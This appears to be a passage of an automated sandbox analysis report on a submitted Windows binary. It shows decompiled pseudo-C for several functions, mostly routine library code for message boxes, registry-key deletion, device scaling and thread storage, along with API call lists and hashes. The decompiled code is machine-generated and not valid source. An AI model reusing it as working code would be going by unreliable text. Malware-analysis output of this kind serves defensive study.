							_t65 =  *((intOrPtr*)(_t76 + 0x10));
							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
							 *_t65 = 0xb;
							goto L19;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							E0040B70E( *(__ebp + 8)) =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L19;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							 *__eax = 0xb;
							goto L19;
						case 4:
							__eax = E00428A50();
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)( *__eax + 0xc))();
							 *(__ebp + 0xc) = __eax;
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E0040824D(__ebp + 0xc, 0xf1c0);
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E0042D2A8(__ebx, __ebp + 0xc, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							 *(__esi + 8) = __eax;
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							goto L18;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							 *(__esi + 8) = GetThreadLocale();
							goto L19;
						case 6:
							if( *(__esi + 0x58) == 0xffffffff) {
								_push( *(__esi + 0x1c));
								__ecx = __ebp - 0x20;
								E0042A852(__ebp - 0x20) =  *(__esi + 0x1c);
								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x5c) = __eax;
								__eax = E0042A8AD(__ebp - 0x20);
							}
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x5c);
							} else {
								__esi =  *(__esi + 0x58);
							}
							 *(__eax + 8) = __esi;
							goto L19;
						case 7:
							if( *(__esi + 0x60) != 0) {
								L13:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x60);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *(__esi + 0x60);
								 *(__edi + 8) =  *(__esi + 0x60);
								goto L19;
							} else {
								__ecx =  *(__esi + 0x1c);
								__eax = E0040A460( *(__esi + 0x1c));
								__ecx = __esi;
								__eax = E0040A7D8(__esi, __eax);
								if( *(__esi + 0x60) == 0) {
									goto L20;
								} else {
									goto L13;
								}
							}
							goto L21;
						case 8:
							__eax = E00428A50();
							__edx =  *__eax;
							__ecx = __eax;
							_t43 = __eax + 0x10; // 0x10
							__esi = _t43;
							 *(__ebp + 0xc) = __esi;
							__edi =  *(__ebp + 0x10);
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx = __ebp + 0xc;
							 *__edi = 8;
							 *(__edi + 8) = E0042D2A8(__ebx, __ebp + 0xc, __edi, __esi);
							_t50 = __esi - 0x10; // 0x0
							__ecx = _t50;
							L18:
							__eax = E00401000(__ecx, __edx);
							L19:
							_t63 = 1;
							goto L21;
						case 9:
							goto L20;
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t63;
			}






                                                                              0x0040aefd
                                                                              0x0040af0a
                                                                              0x0040af15
                                                                              0x0040b0aa
                                                                              0x0040b0aa
                                                                              0x0040af1b
                                                                              0x0040af22
                                                                              0x00000000
                                                                              0x0040af4d
                                                                              0x0040af50
                                                                              0x0040af55
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040af29
                                                                              0x0040af2c
                                                                              0x0040af31
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040b003
                                                                              0x0040b006
                                                                              0x0040b009
                                                                              0x0040b013
                                                                              0x0040b015
                                                                              0x0040b017
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040af3b
                                                                              0x0040af3e
                                                                              0x0040af43
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040b061
                                                                              0x0040b066
                                                                              0x0040b068
                                                                              0x0040b06a
                                                                              0x0040b070
                                                                              0x0040b078
                                                                              0x0040b07b
                                                                              0x0040b082
                                                                              0x0040b087
                                                                              0x0040b08a
                                                                              0x0040b08d
                                                                              0x0040b092
                                                                              0x0040b097
                                                                              0x0040b09a
                                                                              0x0040b09d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040b020
                                                                              0x0040b023
                                                                              0x0040b02e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040af64
                                                                              0x0040af66
                                                                              0x0040af69
                                                                              0x0040af71
                                                                              0x0040af81
                                                                              0x0040af93
                                                                              0x0040af96
                                                                              0x0040af9c
                                                                              0x0040af9f
                                                                              0x0040afa2
                                                                              0x0040afa2
                                                                              0x0040afad
                                                                              0x0040afb0
                                                                              0x0040afb5
                                                                              0x0040afbc
                                                                              0x0040afb7
                                                                              0x0040afb7
                                                                              0x0040afb7
                                                                              0x0040afbf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040afcb
                                                                              0x0040afe7
                                                                              0x0040afe7
                                                                              0x0040afea
                                                                              0x0040afef
                                                                              0x0040aff2
                                                                              0x0040aff4
                                                                              0x0040aff8
                                                                              0x0040affb
                                                                              0x00000000
                                                                              0x0040afcd
                                                                              0x0040afcd
                                                                              0x0040afd0
                                                                              0x0040afd6
                                                                              0x0040afd8
                                                                              0x0040afe1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040afe1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040b033
                                                                              0x0040b038
                                                                              0x0040b03a
                                                                              0x0040b03f
                                                                              0x0040b03f
                                                                              0x0040b042
                                                                              0x0040b045
                                                                              0x0040b048
                                                                              0x0040b04c
                                                                              0x0040b04f
                                                                              0x0040b059
                                                                              0x0040b05c
                                                                              0x0040b05c
                                                                              0x0040b0a0
                                                                              0x0040b0a0
                                                                              0x0040b0a5
                                                                              0x0040b0a7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040af22
                                                                              0x0040b0ac
                                                                              0x0040b0b1
                                                                              0x0040b0b9

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0040AEFD
                                                                              • SendMessageA.USER32(?,00000138,?,?), ref: 0040AF81
                                                                              • GetBkColor.GDI32(?), ref: 0040AF8A
                                                                              • GetTextColor.GDI32(?), ref: 0040AF96
                                                                              • GetThreadLocale.KERNEL32(0000F1C0), ref: 0040B028
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                              • String ID:
                                                                              • API String ID: 741590120-0
                                                                              • Opcode ID: 3bb665a37c1686b71016452803ed37d7d5314458bb89c55caca00ed5bd3541b7
                                                                              • Instruction ID: 9f0f56072def3a876d9543b4c3998127b487ce58a16ed2d3b5e28eadbc79abe1
                                                                              • Opcode Fuzzy Hash: 3bb665a37c1686b71016452803ed37d7d5314458bb89c55caca00ed5bd3541b7
                                                                              • Instruction Fuzzy Hash: B9516D70910306DFCB10EF65C84499EB3F0FF44314B10896EE866AB3A1DB78E855CB9A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042B56F, Relevance: 7.6, APIs: 5, Instructions: 102windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E0042B56F(intOrPtr __ecx) {
				intOrPtr _t30;
				long _t35;
				signed int _t43;
				intOrPtr _t45;
				long _t47;
				struct HWND__* _t50;
				CHAR* _t51;
				int _t52;
				long _t58;
				intOrPtr _t61;
				void* _t64;
				void* _t66;

				_t64 = _t66 - 0x98;
				_t30 =  *0x457184; // 0xb7aa1229
				_t61 = __ecx;
				_t58 = 0;
				_push(0);
				 *((intOrPtr*)(_t64 + 0x94)) = _t30;
				 *((intOrPtr*)(_t64 - 0x7c)) = __ecx;
				E0042B4A4();
				_t50 = E0042B4D1(0, _t64 - 0x74);
				 *(_t64 - 0x80) = _t50;
				if(_t50 !=  *(_t64 - 0x74)) {
					EnableWindow(_t50, 1);
				}
				if(_t50 == 0) {
					L5:
					if(_t61 != 0) {
						_t58 = _t61 + 0x74;
					}
					L7:
					 *(_t64 - 0x78) =  *(_t64 - 0x78) & 0x00000000;
					if(_t58 != 0) {
						 *(_t64 - 0x78) =  *_t58;
						_t45 =  *((intOrPtr*)(_t64 + 0xa8));
						if(_t45 != 0) {
							 *_t58 = _t45 + 0x30000;
						}
					}
					if(( *(_t64 + 0xa4) & 0x000000f0) == 0) {
						_t43 =  *(_t64 + 0xa4) & 0x0000000f;
						if(_t43 <= 1 || _t43 > 2 && _t43 <= 4) {
							 *(_t64 + 0xa4) =  *(_t64 + 0xa4) | 0x00000030;
						}
					}
					 *(_t64 - 0x70) = 0;
					if(_t61 == 0) {
						_t51 = _t64 - 0x70;
						_t35 = GetModuleFileNameA(0, _t51, 0x104);
						_t61 =  *((intOrPtr*)(_t64 - 0x7c));
						if(_t35 == 0x104) {
							 *((char*)(_t64 + 0x93)) = 0;
						}
					} else {
						_t51 =  *(_t61 + 0x4c);
					}
					_t52 = MessageBoxA( *(_t64 - 0x80),  *(_t64 + 0xa0), _t51,  *(_t64 + 0xa4));
					if(_t58 != 0) {
						 *_t58 =  *(_t64 - 0x78);
					}
					if( *(_t64 - 0x74) != 0) {
						EnableWindow( *(_t64 - 0x74), 1);
					}
					_push(1);
					E0042B4A4();
					return E00412FBB(_t52,  *((intOrPtr*)(_t64 + 0x94)));
				}
				_t47 = SendMessageA(_t50, 0x376, 0, 0);
				if(_t47 == 0) {
					goto L5;
				} else {
					_t58 = _t47;
					goto L7;
				}
			}















                                                                              0x0042b570
                                                                              0x0042b57d
                                                                              0x0042b585
                                                                              0x0042b587
                                                                              0x0042b589
                                                                              0x0042b58a
                                                                              0x0042b590
                                                                              0x0042b593
                                                                              0x0042b5a2
                                                                              0x0042b5a7
                                                                              0x0042b5aa
                                                                              0x0042b5af
                                                                              0x0042b5af
                                                                              0x0042b5b7
                                                                              0x0042b5d1
                                                                              0x0042b5d3
                                                                              0x0042b5d5
                                                                              0x0042b5d5
                                                                              0x0042b5d8
                                                                              0x0042b5d8
                                                                              0x0042b5de
                                                                              0x0042b5e2
                                                                              0x0042b5e5
                                                                              0x0042b5ed
                                                                              0x0042b5f4
                                                                              0x0042b5f4
                                                                              0x0042b5ed
                                                                              0x0042b5fd
                                                                              0x0042b605
                                                                              0x0042b60b
                                                                              0x0042b617
                                                                              0x0042b617
                                                                              0x0042b60b
                                                                              0x0042b620
                                                                              0x0042b624
                                                                              0x0042b62b
                                                                              0x0042b639
                                                                              0x0042b641
                                                                              0x0042b644
                                                                              0x0042b646
                                                                              0x0042b646
                                                                              0x0042b626
                                                                              0x0042b626
                                                                              0x0042b626
                                                                              0x0042b665
                                                                              0x0042b667
                                                                              0x0042b66c
                                                                              0x0042b66c
                                                                              0x0042b672
                                                                              0x0042b679
                                                                              0x0042b679
                                                                              0x0042b67f
                                                                              0x0042b683
                                                                              0x0042b69f
                                                                              0x0042b69f
                                                                              0x0042b5c3
                                                                              0x0042b5cb
                                                                              0x00000000
                                                                              0x0042b5cd
                                                                              0x0042b5cd
                                                                              0x00000000
                                                                              0x0042b5cd

                                                                              APIs
                                                                                • Part of subcall function 0042B4D1: GetParent.USER32(?), ref: 0042B524
                                                                                • Part of subcall function 0042B4D1: GetLastActivePopup.USER32(?), ref: 0042B533
                                                                                • Part of subcall function 0042B4D1: IsWindowEnabled.USER32(?), ref: 0042B548
                                                                                • Part of subcall function 0042B4D1: EnableWindow.USER32(?,00000000), ref: 0042B55B
                                                                              • EnableWindow.USER32(?,00000001), ref: 0042B5AF
                                                                              • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0042B5C3
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0042B639
                                                                              • MessageBoxA.USER32 ref: 0042B65D
                                                                              • EnableWindow.USER32(?,00000001), ref: 0042B679
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                              • String ID:
                                                                              • API String ID: 489645344-0
                                                                              • Opcode ID: cc17ad13df1a3ee67ff1c5259f56978a0c41e258bce0c1314db15f8813c101c3
                                                                              • Instruction ID: 5df43b0a18a6f2eac38b2402b0aec1664a59c8d917e7cf72d3b6daf76ea09937
                                                                              • Opcode Fuzzy Hash: cc17ad13df1a3ee67ff1c5259f56978a0c41e258bce0c1314db15f8813c101c3
                                                                              • Instruction Fuzzy Hash: 8A318131B002699FEB309F65ED85B9EB7B4EF05704F54012AEA059B342DBB89940CB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C9C9, Relevance: 7.6, APIs: 5, Instructions: 70registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E0042C9C9(void* __edx) {
				intOrPtr _t28;
				signed int _t31;
				signed int _t35;
				signed int _t44;
				void* _t52;
				void* _t58;
				void* _t60;

				_t52 = __edx;
				E004128A0(E00430D2F, _t58);
				_t28 =  *0x457184; // 0xb7aa1229
				_push(_t44);
				 *((intOrPtr*)(_t58 - 0x14)) = _t28;
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0x11c;
				_t31 = RegOpenKeyA( *(_t58 + 8),  *( *(_t58 + 0xc)), _t58 - 0x124);
				_t56 = _t31;
				if(_t31 == 0) {
					while(1) {
						_t35 = RegEnumKeyA( *(_t58 - 0x124), 0, _t58 - 0x11c, 0x104);
						_t56 = _t35;
						_t64 = _t56;
						if(_t56 != 0) {
							break;
						}
						 *(_t58 - 4) =  *(_t58 - 4) & _t35;
						_push(_t58 - 0x11c);
						E0040830B(_t58 - 0x120, _t64);
						 *(_t58 - 4) = 1;
						_t56 = E0042C9C9(_t52,  *(_t58 - 0x124), _t58 - 0x120);
						_t44 = _t44 & 0xffffff00 | _t56 != 0x00000000;
						 *(_t58 - 4) = 0;
						E00401000( *((intOrPtr*)(_t58 - 0x120)) + 0xfffffff0, _t52);
						if(_t44 == 0) {
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t56 - 0x103;
					if(_t56 == 0x103) {
						L6:
						_t56 = RegDeleteKeyA( *(_t58 + 8),  *( *(_t58 + 0xc)));
					} else {
						__eflags = _t56 - 0x3f2;
						if(_t56 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t58 - 0x124));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return E00412FBB(_t56,  *((intOrPtr*)(_t58 - 0x14)));
			}










                                                                              0x0042c9c9
                                                                              0x0042c9ce
                                                                              0x0042c9d9
                                                                              0x0042c9de
                                                                              0x0042c9e1
                                                                              0x0042c9e9
                                                                              0x0042c9f7
                                                                              0x0042c9fd
                                                                              0x0042ca01
                                                                              0x0042ca07
                                                                              0x0042ca1b
                                                                              0x0042ca21
                                                                              0x0042ca23
                                                                              0x0042ca25
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042ca27
                                                                              0x0042ca30
                                                                              0x0042ca37
                                                                              0x0042ca49
                                                                              0x0042ca58
                                                                              0x0042ca5c
                                                                              0x0042ca62
                                                                              0x0042ca66
                                                                              0x0042ca6d
                                                                              0x0042ca6f
                                                                              0x00000000
                                                                              0x0042ca6f
                                                                              0x00000000
                                                                              0x0042ca6d
                                                                              0x0042ca96
                                                                              0x0042ca9c
                                                                              0x0042caa6
                                                                              0x0042cab4
                                                                              0x0042ca9e
                                                                              0x0042ca9e
                                                                              0x0042caa4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042caa4
                                                                              0x0042cabc
                                                                              0x0042cabc
                                                                              0x0042cac5
                                                                              0x0042cada

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042C9CE
                                                                              • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0042C9F7
                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0042CA1B
                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 0042CAAE
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042CABC
                                                                                • Part of subcall function 0040830B: __EH_prolog.LIBCMT ref: 00408310
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$CloseDeleteEnumOpen
                                                                              • String ID:
                                                                              • API String ID: 4272528234-0
                                                                              • Opcode ID: ea3102a754cbb4f436e45ae9952828ddea18e0d880143fb550b3eccd330439cc
                                                                              • Instruction ID: 7e0fe8125565379c0bf65bc04c102845f328d09770fc18c8dd8b5e8b98c4dc10
                                                                              • Opcode Fuzzy Hash: ea3102a754cbb4f436e45ae9952828ddea18e0d880143fb550b3eccd330439cc
                                                                              • Instruction Fuzzy Hash: F6219C32A00128AFDB26DB58DD41BEDB7B4EF08310F0042A6FD55A73A0D7349E54DB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C13C, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E0042C13C(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x45a328; // 0x60
					_t12 =  *0x45a32c; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E0042A641(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                              0x0042c13f
                                                                              0x0042c142
                                                                              0x0042c147
                                                                              0x0042c193
                                                                              0x0042c199
                                                                              0x00000000
                                                                              0x0042c149
                                                                              0x0042c152
                                                                              0x0042c157
                                                                              0x0042c18d
                                                                              0x0042c18f
                                                                              0x0042c19e
                                                                              0x0042c19e
                                                                              0x0042c1b0
                                                                              0x0042c1b8
                                                                              0x0042c1be
                                                                              0x0042c1c0
                                                                              0x0042c15e
                                                                              0x0042c160
                                                                              0x0042c164
                                                                              0x0042c16c
                                                                              0x0042c173
                                                                              0x0042c176
                                                                              0x0042c176
                                                                              0x0042c157
                                                                              0x0042c1c7

                                                                              APIs
                                                                              • GetMapMode.GDI32(?,?,?,?,?,?,0040B55B,?,00000000,?,77428B90), ref: 0042C14C
                                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 0042C186
                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0042C18F
                                                                                • Part of subcall function 0042A641: MulDiv.KERNEL32(?,00000000,00000000), ref: 0042A681
                                                                                • Part of subcall function 0042A641: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 0042A69E
                                                                              • MulDiv.KERNEL32(?,000009EC,00000060), ref: 0042C1B3
                                                                              • MulDiv.KERNEL32(00000000,000009EC,77428B90), ref: 0042C1BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Mode
                                                                              • String ID:
                                                                              • API String ID: 696222070-0
                                                                              • Opcode ID: be2b5c892061feed72e34d03a9d984e4263a552dacb235a28b2c5ed3044dd559
                                                                              • Instruction ID: 9d8b3eaab7cd4ab2724f394bc59ee48c58965b9ad0b664f9d76e0a227043b165
                                                                              • Opcode Fuzzy Hash: be2b5c892061feed72e34d03a9d984e4263a552dacb235a28b2c5ed3044dd559
                                                                              • Instruction Fuzzy Hash: 3C110231700610AFCB215F55DC85C2EBBE9EF88710751442AFA8557321C774AC11CF98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C1CA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E0042C1CA(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x45a328; // 0x60
					_t12 =  *0x45a32c; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E0042A5D8(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                              0x0042c1cd
                                                                              0x0042c1d0
                                                                              0x0042c1d5
                                                                              0x0042c221
                                                                              0x0042c227
                                                                              0x00000000
                                                                              0x0042c1d7
                                                                              0x0042c1e0
                                                                              0x0042c1e5
                                                                              0x0042c21b
                                                                              0x0042c21d
                                                                              0x0042c22c
                                                                              0x0042c22c
                                                                              0x0042c23e
                                                                              0x0042c247
                                                                              0x0042c249
                                                                              0x0042c24c
                                                                              0x0042c24e
                                                                              0x0042c1ec
                                                                              0x0042c1ee
                                                                              0x0042c1f2
                                                                              0x0042c1fa
                                                                              0x0042c201
                                                                              0x0042c204
                                                                              0x0042c204
                                                                              0x0042c1e5
                                                                              0x0042c255

                                                                              APIs
                                                                              • GetMapMode.GDI32(?,00000000,?,?,?,?,0040B58F,?), ref: 0042C1DA
                                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 0042C214
                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0042C21D
                                                                                • Part of subcall function 0042A5D8: MulDiv.KERNEL32(0040B58F,00000000,00000000), ref: 0042A618
                                                                                • Part of subcall function 0042A5D8: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042A635
                                                                              • MulDiv.KERNEL32(0040B58F,00000060,000009EC), ref: 0042C241
                                                                              • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 0042C24C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Mode
                                                                              • String ID:
                                                                              • API String ID: 696222070-0
                                                                              • Opcode ID: 8ef3bd53c58bb249016fa41b6fd00017a64e29215942d97927a4d66e0e98c08f
                                                                              • Instruction ID: 34d886f5a19aac8f01081610a21fa3fd08f0252832cf54ca366151a787dea025
                                                                              • Opcode Fuzzy Hash: 8ef3bd53c58bb249016fa41b6fd00017a64e29215942d97927a4d66e0e98c08f
                                                                              • Instruction Fuzzy Hash: 3811A031700614EFDB215F95EC84C1EBBE9EF98764751442AE94267360CB75EC01CF69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00416254, Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 41%
                                                                              			E00416254(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x45a5b4( *0x457710);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E004146EA(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E00412D15(0x10);
					} else {
						_push(_t17);
						_push( *0x457710);
						if( *0x45a5b8() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x4577b8;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}









                                                                              0x00416256
                                                                              0x00416262
                                                                              0x0041626a
                                                                              0x0041626c
                                                                              0x0041626e
                                                                              0x00416270
                                                                              0x00416275
                                                                              0x0041627c
                                                                              0x00416282
                                                                              0x004162b1
                                                                              0x004162b3
                                                                              0x00416284
                                                                              0x00416284
                                                                              0x00416285
                                                                              0x00416293
                                                                              0x00000000
                                                                              0x00416295
                                                                              0x00416295
                                                                              0x0041629c
                                                                              0x004162a3
                                                                              0x004162a9
                                                                              0x004162ad
                                                                              0x004162ad
                                                                              0x00416293
                                                                              0x00416282
                                                                              0x004162ba
                                                                              0x004162c4

                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,00000000,004141FF,004148BA,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010,004164BE), ref: 00416256
                                                                              • FlsGetValue.KERNEL32(?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00416264
                                                                              • SetLastError.KERNEL32(00000000,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 004162BA
                                                                                • Part of subcall function 004146EA: __lock.LIBCMT ref: 0041472E
                                                                                • Part of subcall function 004146EA: RtlAllocateHeap.NTDLL(00000008,?,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 0041476C
                                                                              • FlsSetValue.KERNEL32(00000000,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 0041628B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004162A3
                                                                              Memory Dump Source
